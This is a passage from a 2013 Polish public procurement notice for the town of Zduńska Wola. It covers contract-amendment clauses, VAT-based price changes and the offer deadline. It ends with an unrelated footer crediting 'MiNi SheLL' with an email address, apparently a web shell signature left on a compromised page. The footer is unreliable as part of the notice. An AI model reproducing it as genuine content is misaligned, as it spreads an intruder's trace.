2.2.2.	konieczności zmiany materiałów budowlanych, sprzętu, urządzeń, rozwiązań technicznych /technologicznych, w sytuacji gdy wykorzystanie materiałów budowlanych sprzętu, urządzeń, rozwiązań technicznych /technologicznych wskazanych w dokumentacji projektowej lub ofercie stanie się niemożliwe z powodu zaprzestania produkcji, wycofania z rynku lub zastąpienia innymi bądź zastosowanie rozwiązań lub materiałów zamiennych podyktowane będzie względami estetycznymi, usprawnieniem procesu budowy, zwiększeniem bezpieczeństwa na budowie.
Powyższa zmiana umowy jest dopuszczalna pod warunkiem zmiany na materiały, urządzenia i sprzęt, posiadające co najmniej takie parametry jakościowe i cechy użytkowe, jak te, które stanowiły podstawę wyboru oferty (jak te wskazane w dokumentacji projektowej) lub że w trakcie realizacji zamówienia zastosowane zostaną lepszej jakości materiały budowlane lub inne parametry, pod warunkiem niezwiększania ceny.
2.2.3.	zmian legislacyjnych przepisów aktów prawnych normujących wykonanie przedmiotu zamówienia w szczególności prawa budowlanego, w takim przypadku sposób spełnienia świadczenia zostanie zmieniony na zgodny z obowiązującymi przepisami w tym zakresie.
2.3.	zmiana wartości umowy brutto będzie możliwa w przypadku:
2.3.1.	ustawowej zmiany stawki podatku VAT, w takiej sytuacji wartość umowy brutto zostanie zmieniona na wyliczoną w oparciu o aktualne przepisy dotyczące naliczania podatku VAT,
2.3.2.	niewykonania przez Wykonawcę robót budowlanych objętych kosztorysem ofertowym oraz specyfikacją techniczną wykonania i odbioru robót, z tego powodu iż okażą się one niepotrzebne lub z powodu błędów w dokumentacji projektowej, lub z powodu rezygnacji przez Zamawiającego z określonego rodzaju i zakresu umówionych robót budowlanych - zmniejszenie wynagrodzenia jest możliwe wyłącznie na zasadach określonych w § 8 umowy,
2.3.3.	wykonania przez Wykonawcę robót budowlanych objętych kosztorysem ofertowym oraz specyfikacją techniczną wykonania i odbioru robót w większej ilości niż wynika to z ww. dokumentów, w szczególności z powodu braków lub błędów w dokumentacji projektowej - zwiększenie wynagrodzenia jest możliwe wyłącznie na zasadach określonych w § 8 umowy 
3.	W celu dokonania zmiany zapisów umowy wnioskowanych przez Stronę, zobowiązana jest ona pisemnie wystąpić z propozycją zmiany warunków umowy wraz z ich uzasadnieniem. Zmiany te muszą być korzystne lub neutralne dla Zamawiającego.
4.	Wszelkie zmiany do umowy wymagają pisemnego aneksu podpisanego przez strony.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdunskawola.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ dostępna jest w siedzibie Zamawiającego ul. Złotnickiego 12 98-220 Zduńska Wola - Biurze Rozwoju i Inwestycji UM  lub za zaliczeniem pocztowym..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.07.2013 godzina 11:45, miejsce: Biuro Obsługi Interesantów Urzędu Miasta Zduńska Wola
ul. Złotnickiego 12 98-220 Zduńska Wola.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com